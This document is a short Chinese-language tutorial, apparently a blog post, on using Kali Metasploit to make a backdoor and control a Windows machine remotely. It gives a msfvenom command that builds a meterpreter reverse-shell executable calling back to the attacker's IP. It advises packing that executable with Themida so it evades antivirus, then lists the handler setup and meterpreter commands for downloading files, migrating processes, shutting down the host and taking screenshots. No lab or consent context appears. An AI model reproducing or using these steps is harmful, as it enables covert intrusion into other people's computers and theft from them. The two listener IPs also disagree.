kali metasploit制作后门程序远程操控基本使用方法
1.后门程序的制作与加密
后门的实质就是木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe
lhost后面加的是本机ip,lport后面加的是想要打开的端口号
执行后会在本地生成一个biyu.exe的文件
如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。
下载Themida
直接文件拖进去,点击protect会生成一个protect
这会使他躲过大多数杀毒软件扫描
然后将他传到win的系统就可以开始远程操控了
2,kali操控win
在这里使用Xshell进行演示
打开终端
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.31.53
set lport 10000
run
ip与端口和文件创建时一致
此时已开始了监听模式
回到win运行exe
成功连接
此时就可以操纵win了
**
一些基本命令
**
1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)
background(进程隐藏至后台)
sessions(查看已经成功获取的会话,-i 恢复会话)
quit(关闭当前会话)
shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)
irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)
2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)
cat(目标系统文件交互)
getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录)
upload(上传文件或文件夹到目标机 -r 递归)
download(从目标机下载文件或文件夹 -r 递归)
edit(调用vi编辑器,对目标上的文件进行编辑)
search(对目标机的文件进行搜索)
3、网络命令(查看目标网络状况、连接信息,进行端口转发等)
ipconfig(获取目标主机上的网络接口信息)
portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发)
route(显示目标主机路由信息)
4、系统命令(查看目标系统信息、对系统进行基本操作等)
ps(查看目标机正在运行的进程信息)
migrate(将meterpreter会话进程迁移到另一个进程内存空间)
execute(在目标机上执行文件)
getpid(当前会话所在进程的pid值)
kill(终结指定的pid程序)
getuid(获取当前会话用户名)
sysinfo(获取系统信息)
shutdown(关闭目标主机)
5、用户接口命令
screenshot(截获被控主机当前桌面)